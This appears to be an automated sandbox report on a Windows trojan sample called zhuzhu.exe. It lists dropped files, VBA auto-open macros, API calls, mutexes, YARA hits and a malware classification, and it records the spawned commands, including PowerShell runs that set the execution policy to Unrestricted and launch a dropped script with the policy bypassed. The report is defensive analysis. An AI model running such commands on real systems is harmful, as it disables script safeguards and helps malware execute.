                                      Source: XZXHAVGRAG.xlsm.2.dr | Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                      Source: FHfEA7As.xlsm.2.dr | Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                      Source: XZXHAVGRAG.xlsm.2.dr | Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                      Source: FHfEA7As.xlsm.2.dr | Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                      Source: XZXHAVGRAG.xlsm.2.dr | Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exe | Code function: 1_2_02861A37 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exe | Code function: 1_2_02861087 NtdllDefWindowProc_W
                                      Source: C:\Users\user\Downloads\inst.exe | Code function: 7_2_0016E080: GetCurrentProcessId,CreateFileW,DeviceIoControl,CloseHandle
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Code function: 4_2_0377B463 ExitWindowsEx
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Code function: 4_2_0377B43F ExitWindowsEx
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Code function: 4_2_0377B41B ExitWindowsEx
                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: Private Sub Workbook_Open()
                                      Source: FHfEA7As.xlsm.2.dr | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: Private Sub Workbook_Open()
                                      Source: XZXHAVGRAG.xlsm.2.dr | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\inst[1].exe B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dll 0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156
                                      Source: zhuzhu.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                      Source: zhuzhu.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Source: Synaptics.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                      Source: Synaptics.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Source: RCXE77E.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Source: inst[1].exe.1.dr | Static PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                                      Source: inst[1].exe.1.dr | Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                                      Source: inst[1].exe.1.dr | Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
                                      Source: inst[1].exe.1.dr | Static PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
                                      Source: inst[1].exe.1.dr | Static PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
                                      Source: inst[1].exe.1.dr | Static PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
                                      Source: inst[1].exe.1.dr | Static PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
                                      Source: inst.exe.1.dr | Static PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                                      Source: inst.exe.1.dr | Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                                      Source: inst.exe.1.dr | Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
                                      Source: inst.exe.1.dr | Static PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
                                      Source: inst.exe.1.dr | Static PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
                                      Source: inst.exe.1.dr | Static PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
                                      Source: inst.exe.1.dr | Static PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
                                      Source: ~$cache1.2.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Source: zhuzhu.exe, 00000000.00000003.1670734044.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs zhuzhu.exe
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameb! vs zhuzhu.exe
                                      Source: zhuzhu.exe, 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs zhuzhu.exe
                                      Source: zhuzhu.exe, 00000000.00000003.1669279532.0000000000DB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameb! vs zhuzhu.exe
                                      Source: zhuzhu.exe, 00000000.00000003.1670734044.0000000000D56000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFileName# vs zhuzhu.exe
                                      Source: ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs zhuzhu.exe
                                      Source: zhuzhu.exe | Binary or memory string: OriginalFileName vs zhuzhu.exe
                                      Source: zhuzhu.exe | Binary or memory string: OriginalFilenameV vs zhuzhu.exe
                                      Source: zhuzhu.exe | Binary or memory string: OriginalFilenameb! vs zhuzhu.exe
                                      Source: ._cache_zhuzhu.exe.1.dr | Binary or memory string: OriginalFilenameV vs zhuzhu.exe
                                      Source: ._cache_zhuzhu.exe.0.dr | Binary or memory string: OriginalFilenameV vs zhuzhu.exe
                                      Source: zhuzhu.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                      Source: classification engine | Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@26/101@20/14
                                      Source: C:\Users\user\Downloads\inst.exe | Code function: 7_2_5F4D5930 SetLastError,GetLastError,SetLastError,GetLastError,_wcsrchr,_wcsncpy,_strerror,MultiByteToWideChar,_wcsncpy,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,FormatMessageW,_wcstok,_vswprintf_s,_wcsncpy,GetSystemTime,LocalFree,FreeLibrary
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Code function: 4_2_03777B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Code function: 4_2_03777740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Code function: 4_2_03777620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess
                                      Source: C:\Users\user\Downloads\inst.exe | Code function: 7_2_5F4D7A1F GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Code function: 4_2_03776C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exe | Code function: 1_2_1000F260 CreateToolhelp32Snapshot,Process32FirstW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,CloseHandle,_wcsicmp,CloseHandle,Process32NextW,CloseHandle
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Code function: 4_2_03776150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW
                                      Source: C:\Users\user\Downloads\inst.exe | Code function: 7_2_001D0145 _memset,FindResourceW,SizeofResource,LoadResource,LockResource
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                                      Source: C:\Users\user\Desktop\zhuzhu.exe | File created: C:\Users\user\Desktop\._cache_zhuzhu.exe
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exe | Mutant created: \Sessions\1\BaseNamedObjects\Xoreax_LogMutex_._cache_zhuzhu
                                      Source: C:\Users\user\Downloads\inst.exe | Mutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 7556
                                      Source: C:\Users\user\Downloads\inst.exe | Mutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 7448
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5780
                                      Source: C:\Users\user\Downloads\inst.exe | Mutant created: \Sessions\1\BaseNamedObjects\Q360SafeInstallerMutex
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe | Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\XoreaxIncredibuild_._cache_zhuzhu_Mutex
                                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3068:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Mutant created: \Sessions\1\BaseNamedObjects\2024.12. 3
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | Mutant created: \Sessions\1\BaseNamedObjects\XoreaxIncredibuild_._cache_zhuzhu_Mutex_user_WinSta0
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\AppData\Local\Temp\FHfEA7As.xlsm
                                      Source: Yara match File source: zhuzhu.exe, type: SAMPLE
                                      Source: Yara match File source: 1.2.._cache_zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 0.0.zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 1.0.._cache_zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 00000001.00000002.1772641629.0000000000403000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                      Source: Yara match File source: 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara match File source: 00000001.00000000.1663851009.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                      Source: Yara match File source: 00000000.00000000.1657356123.00000000004A5000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara match File source: 00000000.00000003.1666861585.00000000067FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara match File source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                                      Source: Yara match File source: C:\ProgramData\Synaptics\RCXE77E.tmp, type: DROPPED
                                      Source: Yara match File source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, type: DROPPED
                                      Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                      Source: Yara match File source: C:\Users\user\Desktop\._cache_zhuzhu.exe, type: DROPPED
                                      Source: C:\Users\user\Desktop\zhuzhu.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                      Source: C:\Users\user\Desktop\zhuzhu.exe File read: C:\Users\user\Desktop\desktop.ini
                                      Source: C:\Users\user\Desktop\zhuzhu.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                      Source: zhuzhu.exe Virustotal: Detection: 83%
                                      Source: zhuzhu.exe ReversingLabs: Detection: 92%
                                      Source: ._cache_zhuzhu.exe String found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvaila
                                      Source: ._cache_zhuzhu.exe String found in binary or memory: le> <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
                                      Source: inst.exe String found in binary or memory: /pid=%s /noreboot=1 /installer=1 /SMARTSILENCE
                                      Source: inst.exe String found in binary or memory: --secore-restore --360se_pid=8000041 --silent-install --not-create-mplnk
                                      Source: zhuzhu.exe String found in binary or memory: -ADDCUSTOMCOLORBUTTON_CAP=Add to Custom Colors
                                      Source: C:\Users\user\Desktop\zhuzhu.exe File read: C:\Users\user\Desktop\zhuzhu.exe
                                      Source: unknown Process created: C:\Users\user\Desktop\zhuzhu.exe "C:\Users\user\Desktop\zhuzhu.exe"
                                      Source: C:\Users\user\Desktop\zhuzhu.exe Process created: C:\Users\user\Desktop\._cache_zhuzhu.exe "C:\Users\user\Desktop\._cache_zhuzhu.exe"
                                      Source: C:\Users\user\Desktop\zhuzhu.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                      Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exe Process created: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe "C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe"
                                      Source: unknown Process created: C:\Users\user\Downloads\inst.exe C:\Users\user\Downloads\inst.exe
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: unknown Process created: C:\Users\user\Downloads\inst.exe C:\Users\user\Downloads\inst.exe
                                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                      Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                      Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: winrnr.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: dxgi.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: dinput8.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: inputhost.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: coremessaging.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: propsys.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: coreuicomponents.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: ntmarta.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: resourcepolicyclient.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: devenum.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: devobj.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: msasn1.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: msdmo.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: avicap32.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: msvfw32.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: windowscodecs.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: avicap32.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: msvfw32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: msimg32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: version.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: netutils.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: firewallapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: fwbase.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: fwpolicyiomgr.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: winhttp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: winnsi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: cabinet.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: netapi32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: secur32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: rasapi32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: rasman.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: dhcpcsvc.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: napinsp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: pnrpnsp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wshbth.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: nlaapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: winrnr.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: rtutils.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: cabinet.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: dhcpcsvc6.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wbemcomn.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: amsi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: userenv.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: propsys.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: windows.fileexplorer.common.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: ntshrui.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: cscapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: ntmarta.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: linkinfo.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: windowscodecs.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: textinputframework.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: coreuicomponents.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: coremessaging.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: coremessaging.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: dwrite.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: textshaping.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: cabinet.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: msimg32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: version.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
